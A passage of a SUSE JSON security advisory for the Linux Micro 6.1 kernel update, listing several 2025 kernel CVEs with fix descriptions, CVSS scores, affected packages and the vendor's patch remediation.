"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71098"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71098",
"url": "https://www.suse.com/security/cve/CVE-2025-71098"
},
{
"category": "external",
"summary": "SUSE Bug 1256591 for CVE-2025-71098",
"url": "https://bugzilla.suse.com/1256591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71100",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71100"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71100",
"url": "https://www.suse.com/security/cve/CVE-2025-71100"
},
{
"category": "external",
"summary": "SUSE Bug 1256593 for CVE-2025-71100",
"url": "https://bugzilla.suse.com/1256593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71108",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71108"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: Handle incorrect num_connectors capability\n\nThe UCSI spec states that the num_connectors field is 7 bits, and the\n8th bit is reserved and should be set to zero.\nSome buggy FW has been known to set this bit, and it can lead to a\nsystem not booting.\nFlag that the FW is not behaving correctly, and auto-fix the value\nso that the system boots correctly.\n\nFound on Lenovo P1 G8 during Linux enablement program. The FW will\nbe fixed, but seemed worth addressing in case it hit platforms that\naren\u0027t officially Linux supported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71108",
"url": "https://www.suse.com/security/cve/CVE-2025-71108"
},
{
"category": "external",
"summary": "SUSE Bug 1256774 for CVE-2025-71108",
"url": "https://bugzilla.suse.com/1256774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71108"
},
{
"cve": "CVE-2025-71111",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71111"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (w83791d) Convert macros to functions to avoid TOCTOU\n\nThe macro FAN_FROM_REG evaluates its arguments multiple times. When used\nin lockless contexts involving shared driver data, this leads to\nTime-of-Check to Time-of-Use (TOCTOU) race conditions, potentially\ncausing divide-by-zero errors.\n\nConvert the macro to a static function. This guarantees that arguments\nare evaluated only once (pass-by-value), preventing the race\nconditions.\n\nAdditionally, in store_fan_div, move the calculation of the minimum\nlimit inside the update lock. This ensures that the read-modify-write\nsequence operates on consistent data.\n\nAdhere to the principle of minimal changes by only converting macros\nthat evaluate arguments multiple times and are used in lockless\ncontexts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71111",
"url": "https://www.suse.com/security/cve/CVE-2025-71111"
},
{
"category": "external",
"summary": "SUSE Bug 1256728 for CVE-2025-71111",
"url": "https://bugzilla.suse.com/1256728"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71111"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceive a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
